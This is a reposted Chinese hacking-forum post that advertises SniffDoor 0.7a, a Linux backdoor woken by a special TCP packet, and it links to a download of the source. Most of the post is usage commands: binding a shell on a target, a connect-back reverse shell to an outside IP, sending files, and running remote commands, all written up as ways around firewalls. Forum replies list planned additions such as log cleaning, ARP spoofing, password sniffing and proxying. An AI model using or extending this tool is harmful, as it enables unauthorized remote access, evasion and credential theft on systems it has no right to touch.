[转载]SniffDoor V 0.7a (开源代码)
文章作者:wzt原始出处:xsec.org
SniffDoor V 0.7a (c) 2007 by wzt <[email]wzt@xsec.org[/email]>
+--------------------------------------------------+
Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with tcp packet,that's means the server side
can sniff your files in the special tcp packets,
and save on its server.The client can send a shell
command with the packet,the server sniff and execute
it,so it can round the firewall.
+--------------------------------------------------+
[USAGE]:
server:
type make;
./sniffdoor
client:
type make;
sniffdoor <options> [remote_ip] [port] [command]
<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>
<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>
1. bindshell:
send tcp packet to host 61.155.217.56,and then it
bind a shell on port 999
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
port 22 is a active port on the host.
2.connect back door:
1).you server must listen a port first(your ip
is 123.45.64.57):
./client -listen 999
2).send tcp packet to host 61.155.217.56,and then
bind a shell to remote 123.45.64.57 on port 999
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999
3.send file:
1).send file with tcp packet.
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c
NOTE!
It can only send txt files , not binary files.
If you fixed up this bug,mail to me,thx.
4.execute command:
1).execute command with tcp packet.
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"
+-----------------------------------------------------+
[THANKS]:
Thank baozi for testing the door all the time.
[END]:
send any bug to <[email]wzt@xsec.org[/email]>.
download: [url]http://wzt.wzt.googlepages.com/sniffdoor.tar[/url]
打算做成一个allinone的东西,大家多提建议,看看作为一个linux下的后么+渗透程序还需要什么功能(当然,攻击目标完全可以是windows)。
我的req
1:ttysniffer弄进来 -->难度十分之大。
[color=#FF0000]2:把windows下的htran移植进来,包括socks5(带用户密码) -->有点难度,比如client 发送 ip pack -proxy -bind eth0 port user pass -->正在进行时![/color]
3:logcleaner -->easy job
4:portscanner with banner grabber -->the same
5:nbtenum for windows -->easy job
6:arp欺骗+网络sniffer弄进来,可以抓一些明文的密码,如果可以抓smb就超级强了 -->难度一般
7:mssql scan + mssql client --> easy job 我说xsec怎么好久不更新了呢,呵呵
支持一下 最近大家都忙,懒得更新了,呵呵
多谢关注:)
页:
[1]